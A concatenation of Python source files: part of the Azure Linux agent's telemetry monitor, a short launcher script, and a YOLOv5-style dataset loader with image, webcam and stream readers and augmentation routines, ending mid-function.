self.last_telemetry_heartbeat = datetime.datetime.utcnow() - MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD
if datetime.datetime.utcnow() >= (self.last_telemetry_heartbeat + MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD):
try:
incarnation = self.protocol.get_incarnation()
dropped_packets = self.osutil.get_firewall_dropped_packets(self.protocol.endpoint)
msg = "{0};{1};{2};{3}".format(incarnation, self.counter, self.heartbeat_id, dropped_packets)
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HeartBeat,
is_success=True,
message=msg,
log_event=False)
self.counter += 1
io_errors = IOErrorCounter.get_and_reset()
hostplugin_errors = io_errors.get("hostplugin")
protocol_errors = io_errors.get("protocol")
other_errors = io_errors.get("other")
if hostplugin_errors > 0 or protocol_errors > 0 or other_errors > 0:
msg = "hostplugin:{0};protocol:{1};other:{2}".format(hostplugin_errors,
protocol_errors,
other_errors)
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.HttpErrors,
is_success=True,
message=msg,
log_event=False)
except Exception as e:
logger.warn("Failed to send heartbeat: {0}", e)
self.last_telemetry_heartbeat = datetime.datetime.utcnow()
@staticmethod
def init_cgroups():
# Track metrics for the wrapper cgroup and for the agent cgroup
try:
# This creates the wrapper cgroup for everything under agent,
# /sys/fs/cgroup/{cpu,memory}/WALinuxAgent/
# There is no need in tracking this cgroup, as it only serves
# as an umbrella for the agent and extensions cgroups
CGroups.for_extension("")
# This creates the agent's cgroup (for the daemon and extension handler)
# /sys/fs/cgroup/{cpu,memory}/WALinuxAgent/WALinuxAgent
# If the system is using systemd, it would have already been set up under /system.slice
CGroupsTelemetry.track_agent()
except Exception as e:
# when a hierarchy is not mounted, we raise an exception
# and we should therefore only issue a warning, since this
# is not unexpected
logger.warn("Monitor: cgroups not initialized: {0}", ustr(e))
logger.verbose(traceback.format_exc())
def send_cgroup_telemetry(self):
if self.last_cgroup_telemetry is None:
self.last_cgroup_telemetry = datetime.datetime.utcnow()
if datetime.datetime.utcnow() >= (self.last_telemetry_heartbeat + MonitorHandler.CGROUP_TELEMETRY_PERIOD):
try:
metric_reported, metric_threshold = CGroupsTelemetry.collect_all_tracked()
for cgroup_name, metrics in metric_reported.items():
thresholds = metric_threshold[cgroup_name]
for metric_group, metric_name, value in metrics:
if value > 0:
report_metric(metric_group, metric_name, cgroup_name, value)
if metric_group == "Memory":
# Memory is collected in bytes, and limit is set in megabytes.
if value >= CGroups._format_memory_value('megabytes', thresholds.memory_limit):
msg = "CGroup {0}: Crossed the Memory Threshold. " \
"Current Value: {1} bytes, Threshold: {2} megabytes." \
.format(cgroup_name, value, thresholds.memory_limit)
logger.warn(msg)
add_event(name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.CGroupsLimitsCrossed,
is_success=True,
message=msg,
log_event=True)
if metric_group == "Process":
if value >= thresholds.cpu_limit:
msg = "CGroup {0}: Crossed the Processor Threshold. " \
"Current Value: {1}, Threshold: {2}." \
.format(cgroup_name, value, thresholds.cpu_limit)
logger.warn(msg)
add_event(name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.CGroupsLimitsCrossed,
is_success=True,
message=msg,
log_event=True)
except Exception as e:
logger.warn("Monitor: failed to collect cgroups performance metrics: {0}", ustr(e))
logger.verbose(traceback.format_exc())
# Look for extension cgroups we're not already tracking and track them
try:
CGroupsTelemetry.update_tracked(self.protocol.client.get_current_handlers())
except Exception as e:
logger.warn("Monitor: failed to update cgroups tracked extensions: {0}", ustr(e))
logger.verbose(traceback.format_exc())
self.last_cgroup_telemetry = datetime.datetime.utcnow()
def log_altered_network_configuration(self):
"""
Check various pieces of network configuration and, if altered since the last check, log the new state.
"""
raw_route_list = self.osutil.read_route_table()
digest = hash_strings(raw_route_list)
if digest != self.last_route_table_hash:
self.last_route_table_hash = digest
route_list = self.osutil.get_list_of_routes(raw_route_list)
logger.info("Route table: [{0}]".format(",".join(map(networkutil.RouteEntry.to_json, route_list))))
nic_state = self.osutil.get_nic_state()
if nic_state != self.last_nic_state:
description = "Initial" if self.last_nic_state == {} else "Updated"
logger.info("{0} NIC state: [{1}]".format(description, ", ".join(map(str, nic_state.values()))))
self.last_nic_state = nic_state
|
run.py | from web_frontend import app
from model_server import start_model_server
from threading import Thread
model_server_thread = Thread(target=start_model_server)
model_server_thread.start()
app.run()
|
datasets.py | import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
local_rank=-1, world_size=1):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache.
with torch_distributed_zero_first(local_rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, 8]) # number of workers
train_sampler = torch.utils.data.distributed.DistributedSampler(dataset) if local_rank != -1 else None
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=train_sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
l = self.labels[i] # label
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = [None, None]
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = s, s # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
